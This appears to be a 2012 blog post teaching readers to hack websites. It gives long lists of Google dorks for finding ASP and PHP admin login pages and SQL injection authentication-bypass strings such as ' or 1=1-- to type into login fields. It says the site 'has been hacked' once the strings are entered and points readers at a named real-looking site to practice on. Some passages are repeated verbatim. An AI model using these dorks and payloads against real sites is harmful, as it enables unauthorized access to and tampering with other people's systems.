First of all goto google.com and search any one of the below dork in google and
open that
link....
inurl:adminlogin.asp
inurl:admin_login.asp
inurl:adminlogon.asp
inurl:admin_logon.asp
inurl:\\admin/admin_login.php
inurl:/admin.asp
inurl:/login.asp
inurl:/logon.asp
inurl:/adminlogin.asp
inurl:/adminlogon.asp
inurl:/admin_login.asp
inurl:/admin_logon.asp
inurl:/admin/admin.asp
inurl:/admin/login.asp
inurl:/admin/logon.asp
inurl:/admin/adminlogin.asp
inurl:/admin/adminlogon.asp
inurl:/admin/admin_login.asp
inurl:/admin/admin_logon.asp
inurl:/administrator/admin.asp
inurl:/administrator/login.asp
inurl:/administrator/logon.asp
inurl:root/login.asp
inurl:admin/index.asp
Click
On Search Button.
Then click on website URL. when its open there
will be space for entering
USER
NAME
OR
PASWORD
then in USERNAME box enter or Type
Admin
and in PASSWORD Type any one of the below code
:
admin'--
1'or'1'='1
' or 0=0 --
" or 0=0
--
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
'
or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or
1=1--
or 1=1--
' or a=a--
" or "a"="a
') or
('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1
--
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi")
or ("a"="a
1' OR '1'='1
then hit enter key . .
.
now web has been hacked . . .
And Start Changing In
ADMIN PANEL Ok'z.
Test ur experinse
here
http://globaloiljobs.com/Admin_Login.asp
its Admin
Id (Username) Type 1' OR '1'='1
Or
Pasword 1' OR '1'='1
inurl:login/admin.asp, inurl adminlogin.asp, inurl:admin/login.asp
Use the keywords "inurl:admin.asp", "inurl:login/admin.asp", "inurl:admin/login.asp", "inurl:adminlogin.asp", "inurl:administratorlogin.asp", "inurl:login/administrator.asp" to hack the websites.
Tuesday, May 29, 2012
Sql Injection Manual Testing
Search for login or Admin login Pages.
ex: google dork. Go to google Home page
in search bar type.. " inurl:/admin/login.asp" or " inurl: /adminlogin.asp" ...somewhat like that
put the sql magic qoutes in username and password fields.There are many sql quotes like :
ex: google dork. Go to google Home page
in search bar type.. " inurl:/admin/login.asp" or " inurl: /adminlogin.asp" ...somewhat like that
put the sql magic qoutes in username and password fields.There are many sql quotes like :
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
- ='or''=
Subscribe to:
Posts (Atom)